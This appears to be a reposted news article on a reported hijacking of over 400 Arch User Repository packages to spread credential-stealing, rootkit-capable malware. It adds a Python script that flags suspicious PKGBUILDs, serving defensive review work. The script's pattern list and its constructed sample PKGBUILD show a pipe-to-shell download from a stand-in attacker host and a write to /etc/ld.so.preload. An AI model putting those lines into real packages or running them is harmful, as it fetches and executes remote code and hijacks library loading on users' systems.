400+ Arch Linux Packages Hijacked To Install Rootkit-Like Malware

https://www.linkedin.com/pulse/400-arch-linux-packages-hijacked-install-rootkit-like-phsce

Publish Date: 2026-06-13 15:30:00

Source Domain: www.linkedin.com

Security researchers have uncovered one of the largest malicious package campaigns to impact the Arch Linux ecosystem in recent years, with more than 400 software packages hosted in the Arch User Repository (AUR) allegedly modified to distribute a sophisticated credential-stealing malware platform capable of deploying kernel-level rootkit functionality.

The incident has reignited concerns over software supply-chain security within open-source ecosystems, highlighting how trusted community repositories can be weaponized by attackers seeking access to developer workstations, cloud infrastructure credentials, and enterprise environments.

Researchers from the Independent Federated Intelligence Network (IFIN), independent analysts, and software supply-chain security firm Sonatype have collectively documented a campaign in which threat actors abused package maintenance mechanisms within Arch Linux’s community-driven repository infrastructure to distribute malware disguised as legitimate software updates.

The discovery affects hundreds of packages hosted on the Arch User Repository, a widely used software distribution platform that extends the capabilities of the Arch Linux operating system beyond its official repositories.

Trusted Repository Becomes Attack Vector

Unlike officially maintained repositories, the Arch User Repository operates as a community-managed platform where users can contribute package build instructions known as PKGBUILDs. These scripts automate the downloading, compilation, and installation of software that may not be available through Arch Linux’s official channels.
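Because a PKGBUILD is an ordinary shell script that decides what gets downloaded, compiled and installed, the review of that script is the main control a user has before running makepkg. The following is an added example written for this page, not code from the article, from the researchers it cites, or from Arch Linux's own tooling: it parses the source and checksum arrays and the build/package function bodies of a PKGBUILD and returns the points a reviewer should look at (sources fetched from a host other than the declared upstream, checksums set to SKIP, and a few shell idioms that have no place in a normal build). The sample PKGBUILDs, the hostnames in them and the pattern list are constructed assumptions.

```python
"""Static review of an Arch PKGBUILD for supply-chain red flags (illustrative)."""
import re
import shlex
from urllib.parse import urlparse

# Shell idioms in prepare()/build()/package() that deserve a human look.
# This list is an assumption for the example, not an official Arch check.
SUSPICIOUS_PATTERNS = {
    "pipe-to-shell": re.compile(r"(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
    "ld.so.preload write": re.compile(r"/etc/ld\.so\.preload"),
    "kernel module load": re.compile(r"\b(insmod|modprobe)\b"),
    "base64 decode": re.compile(r"base64\s+(-d|--decode)\b"),
}

ARRAY_RE = re.compile(r"^(\w+)=\((.*?)\)", re.MULTILINE | re.DOTALL)
URL_RE = re.compile(r"^url=[\"']?([^\"'\n]+)", re.MULTILINE)
FUNC_RE = re.compile(
    r"^(prepare|build|check|package(?:_\w+)?)\s*\(\)\s*\{(.*?)^\}",
    re.MULTILINE | re.DOTALL,
)
VCS_RE = re.compile(r"^(git|hg|svn|bzr)\+")


def parse_arrays(text):
    """Return {name: [tokens]} for every bash array assignment such as source=(...)."""
    return {name: shlex.split(inner, comments=True) for name, inner in ARRAY_RE.findall(text)}


def upstream_host(text):
    """Host of the url= field, i.e. where the maintainer says the project lives."""
    m = URL_RE.search(text)
    return urlparse(m.group(1)).hostname if m else None


def source_host(entry):
    """Host a source entry downloads from; None for local files shipped with the PKGBUILD."""
    url = entry.split("::", 1)[1] if "::" in entry else entry   # strip "name::" prefix
    return urlparse(VCS_RE.sub("", url)).hostname                # strip git+/hg+ scheme prefix


def review(text):
    """Return a list of human-readable findings; an empty list means nothing stood out."""
    findings = []
    arrays = parse_arrays(text)
    sources = arrays.get("source", [])       # arch-specific source_* arrays are not paired here
    sums = {n: v for n, v in arrays.items() if n.endswith("sums")}
    if sources and not sums:
        findings.append("no checksum array: no source is integrity-checked")
    for name, values in sums.items():
        for i, value in enumerate(values):
            if value != "SKIP":
                continue
            entry = sources[i] if i < len(sources) else ""
            if VCS_RE.match(entry.split("::", 1)[-1]):
                continue                      # VCS sources legitimately use SKIP
            findings.append(f"{name}[{i}] is SKIP: source[{i}] is fetched without an integrity check")
    upstream = upstream_host(text)
    for i, entry in enumerate(sources):
        host = source_host(entry)
        if host and upstream and host != upstream:   # a mirror can be legitimate; flag for review
            findings.append(f"source[{i}] is fetched from {host}, which differs from the url= host {upstream}")
    for func, body in FUNC_RE.findall(text):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(body):
                findings.append(f"{func}(): {label}")
    return findings


# Constructed sample: a tampered-looking PKGBUILD (hostname is a reserved .invalid name).
SAMPLE_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
url="https://example.org/example-tool"
arch=('x86_64')
source=("$pkgname-$pkgver.tar.gz::https://example.org/releases/$pkgver.tar.gz"
        "helper.sh::https://cdn.attacker-controlled.invalid/helper.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -s https://cdn.attacker-controlled.invalid/setup | sh
  echo "$pkgdir/usr/lib/libhook.so" >> /etc/ld.so.preload
}
"""

# Constructed sample: an unremarkable PKGBUILD that should produce no findings.
CLEAN_PKGBUILD = r"""
pkgname=example-tool
pkgver=1.2.3
url="https://example.org/example-tool"
source=("https://example.org/releases/$pkgver.tar.gz")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')

package() {
  make DESTDIR="$pkgdir" install
}
"""

if __name__ == "__main__":
    for finding in review(SAMPLE_PKGBUILD):
        print("-", finding)
```

Run against a real PKGBUILD (`review(open("PKGBUILD").read())`) the output is a review checklist, not a verdict: a source hosted on a mirror or a code-hosting site that differs from the project page is common and legitimate, so each finding is meant to be read alongside the PKGBUILD's change history rather than acted on blindly.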